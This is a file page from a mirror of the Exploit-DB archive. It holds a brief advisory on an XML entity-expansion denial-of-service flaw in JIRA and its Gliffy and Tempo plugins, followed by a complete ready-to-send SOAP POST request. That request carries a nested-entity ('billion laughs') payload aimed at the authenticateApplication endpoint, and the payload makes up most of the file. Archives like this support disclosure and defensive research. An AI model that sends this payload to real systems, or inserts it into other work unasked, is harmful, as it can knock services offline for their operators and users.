bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/jsp/dos/37218.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

52 lines
No EOL
2.2 KiB
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/53595/info
JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.
Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.
The following versions are affected:
Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable.
POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
<soapenv:Header/>
<soapenv:Body>
<urn:authenticateApplication>
<urn:in0>
<aut:credential>
<aut:credential>stuff1</aut:credential>
<aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
</aut:credential>
<aut:name>stuff3</aut:name>
<aut:validationFactors>
<aut:ValidationFactor>
<aut:name>stuff4</aut:name>
<aut:value>stuff5</aut:value>
</aut:ValidationFactor>
</aut:validationFactors>
</urn:in0>
</urn:authenticateApplication>
</soapenv:Body>
</soapenv:Envelope>
Reference in a new issue View git blame Copy permalink